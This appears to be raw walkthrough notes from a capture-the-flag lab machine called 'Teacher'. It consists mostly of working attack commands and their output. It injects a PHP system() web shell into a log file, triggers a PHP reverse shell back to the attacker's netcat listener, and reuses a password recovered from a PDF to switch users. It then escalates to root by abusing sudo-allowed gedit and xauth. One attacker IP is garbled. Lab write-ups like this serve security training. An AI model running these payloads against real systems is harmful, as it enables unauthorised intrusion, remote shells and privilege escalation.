teacher
GET /access.php?id=<%3fphp+system($_GET['cmd'])%3b%3f> HTTP/1.1writes parameter to log.php
GET /log.php?cmd=php+-r+'$sock%3dfsockopen("10.10teacher.10.73",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b' HTTP/1.1┌──(root💀kali)-[/opt/hmv/teacher]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.10.73] from (UNKNOWN) [10.10.10.122] 57378
/bin/sh: 0: cant access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@Teacher:/var/www/html$ ls -lash
ls -lash
total 5.3M
4.0K drwxr-xr-x 2 root root 4.0K Aug 26 19:39 .
4.0K drwxr-xr-x 3 root root 4.0K Aug 24 17:24 ..
4.0K -rw-r--r-- 1 root root 191 Aug 25 16:53 access.php
4.0K -rw-r--r-- 1 root root 48 Aug 26 19:39 clearlogs.php
5.1M -rw-r--r-- 1 mrteacher mrteacher 5.1M Aug 25 17:38 e14e1598b4271d8449e7fcda302b7975.pdf
4.0K -rw-r--r-- 1 root root 315 Aug 26 16:51 index.html
8.0K -rwxrwxrwx 1 root root 5.9K Sep 7 15:06 log.php
128K -rw-r--r-- 1 root root 128K Aug 26 16:39 rabbit.jpg
www-data@Teacher:/var/www/html$ file e14e1598b4271d8449e7fcda302b7975.pdf
file e14e1598b4271d8449e7fcda302b7975.pdf
e14e1598b4271d8449e7fcda302b7975.pdf: PDF document, version 1.4 (password protected)password in pdf
┌──(root💀kali)-[/opt/hmv/teacher]
└─# wget http://10.10.10.122/e14e1598b4271d8449e7fcda302b7975.pdf
--2022-09-07 07:08:26-- http://10.10.10.122/e14e1598b4271d8449e7fcda302b7975.pdf
Connecting to 10.10.10.122:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5301604 (5.1M) [application/pdf]
Saving to: ‘e14e1598b4271d8449e7fcda302b7975.pdf’back on box
www-data@Teacher:/var/www/html$ su mrteacher
su mrteacher
Password: ThankYouTeachers
mrteacher@Teacher:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for mrteacher on Teacher:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User mrteacher may run the following commands on Teacher:
(ALL : ALL) NOPASSWD: /bin/gedit, /bin/xauth
┌──(root💀kali)-[/opt/hmv/teacher]
└─# ssh -X mrteacher@10.10.10.122
The authenticity of host '10.10.10.122 (10.10.10.122)' cant be established.
ED25519 key fingerprint is SHA256:hShUum4jvn2yQa8RsN2brmvRwoUyIktGfCx1BfrAPQA.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.122' (ED25519) to the list of known hosts.
mrteacher@10.10.10.122s password:
Linux Teacher 5.10.0-17-amd64 #1 SMP Debian 5.10.136-1 (2022-08-13) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Sep 5 17:55:42 2022 from 192.168.1.23
mrteacher@Teacher:~$ sudo -l
Matching Defaults entries for mrteacher on Teacher:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User mrteacher may run the following commands on Teacher:
(ALL : ALL) NOPASSWD: /bin/gedit, /bin/xauth
mrteacher@Teacher:~$ sudo -u root /bin/gedit
X11 connection rejected because of wrong authentication.
Unable to init server: Could not connect: Connection refused
(gedit:938): Gtk-WARNING **: 15:12:03.860: cannot open display: localhost:10.0
# https://www.ibm.com/support/pages/x11-forwarding-ssh-connection-rejected-because-wrong-authentication
mrteacher@Teacher:~$ sudo -u root /bin/xauth add $(xauth -f ~mrteacher/.Xauthority list | tail -1)
mrteacher@Teacher:~$ sudo -u root /bin/geditgedit opens and we can read whatever we want as root